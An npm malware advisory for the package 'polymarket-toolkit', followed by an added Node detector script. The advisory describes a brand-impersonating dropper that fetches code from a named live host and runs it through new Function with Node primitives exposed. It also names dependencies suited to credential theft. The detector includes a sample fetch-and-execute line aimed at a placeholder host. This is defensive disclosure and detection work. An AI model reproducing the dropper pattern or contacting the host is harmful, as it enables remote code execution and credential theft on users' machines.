npm

polymarket-toolkit @1.4.9

Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC

Malicious

OSV ID

MAL-2026-6713

Ecosystem

npm

Summary

Package is published as a Polymarket API client but its default export getPlugin performs unconditional remote code execution on use. On invocation it issues an HTTPS request to https://svganchordev.net/icons/109, takes the data.credits field from the JSON response, and passes it to new Function('require','module',...,'Promise', data.credits) with a context object exposing require, process, Buffer, and related Node primitives, then immediately invokes it. The fetched JavaScript runs with full Node privileges on the installer's machine. The surrounding code is dressed as an icon/CDN helper (variable names IconProvider, iconDomain, a map of cloudflare/fastly/akamai hosts, font-awesome path literals), but those strings are unused decoys; the live request path resolves to the hardcoded svganchordev.net host. Declared dependencies (@primno/dpapi for Windows DPAPI, better-sqlite3, node-machine-id) are consistent with browser-credential and machine-fingerprint extraction and are unrelated to a Polymarket API SDK. Package keywords (react, helper, svg) also do not match the advertised purpose. The shape is a brand-impersonating dropper targeting developers searching for a Polymarket toolkit.

Source: amazon-inspector (65aa9243f492d222e1bb036c8ed55fb17268bd987a63ad2ea2aa1b28e44defc3)
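As an added illustration (not part of the OSV record or of the package it describes), the Node script below applies a static heuristic for the dropper shape the summary outlines: runtime code construction via new Function() whose parameters expose Node primitives, a hardcoded HTTPS endpoint, harvesting-oriented dependencies, and keywords that share nothing with the package name. The sample package.json and source are constructed, and the hosts are placeholders.

```javascript
// Added example; constructed input, not the real package contents.
const CREDENTIAL_DEPS = ['@primno/dpapi', 'node-machine-id', 'better-sqlite3'];
const NODE_PRIMITIVES = ['require', 'process', 'module', 'Buffer'];

function scanPackage(pkgJson, source) {
  const findings = [];

  // 1. new Function(...) whose parameter list hands Node primitives to fetched code.
  const fnCall = /new\s+Function\s*\(([^)]*)\)/g;
  for (let m; (m = fnCall.exec(source)) !== null; ) {
    const exposed = NODE_PRIMITIVES.filter(p => new RegExp(`['"]${p}['"]`).test(m[1]));
    if (exposed.length) findings.push(`dynamic-code-exec exposing ${exposed.join(',')}`);
  }

  // 2. Hardcoded HTTPS hosts the package contacts at runtime (decoys included).
  const hosts = new Set();
  for (let m, re = /https:\/\/([a-z0-9.-]+)/gi; (m = re.exec(source)) !== null; ) hosts.add(m[1].toLowerCase());
  if (hosts.size) findings.push(`remote-hosts ${[...hosts].join(',')}`);

  // 3. Dependencies consistent with credential or machine-fingerprint harvesting.
  const creds = Object.keys(pkgJson.dependencies || {}).filter(d => CREDENTIAL_DEPS.includes(d));
  if (creds.length) findings.push(`credential-deps ${creds.join(',')}`);

  // 4. Keywords that share no token with the package name (brand mismatch).
  const nameTokens = pkgJson.name.toLowerCase().split(/[^a-z0-9]+/).filter(Boolean);
  const kws = (pkgJson.keywords || []).map(k => k.toLowerCase());
  if (kws.length && !kws.some(k => nameTokens.some(t => k.includes(t) || t.includes(k))))
    findings.push('keyword-mismatch');

  // Dropper shape = runtime code construction plus a remote fetch; signals 3 and 4 add confidence.
  const isDropper = findings.some(f => f.startsWith('dynamic-code-exec')) && hosts.size > 0;
  return { findings, isDropper };
}

// Constructed sample mimicking the reported shape; no real payload or host.
const SAMPLE_PKG = {
  name: 'polymarket-toolkit',
  keywords: ['react', 'helper', 'svg'],
  dependencies: { '@primno/dpapi': '*', 'better-sqlite3': '*', 'node-machine-id': '*' },
};
const SAMPLE_SRC = `
const iconDomain = 'https://cdn.example.invalid/icons/';   // decoy, never used
https.get('https://dropper.example.invalid/icons/1', res => {
  const fn = new Function('require', 'module', 'process', 'Buffer', 'Promise', data.credits);
  fn(require, module, process, Buffer, Promise);
});`;

console.log(scanPackage(SAMPLE_PKG, SAMPLE_SRC));
```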
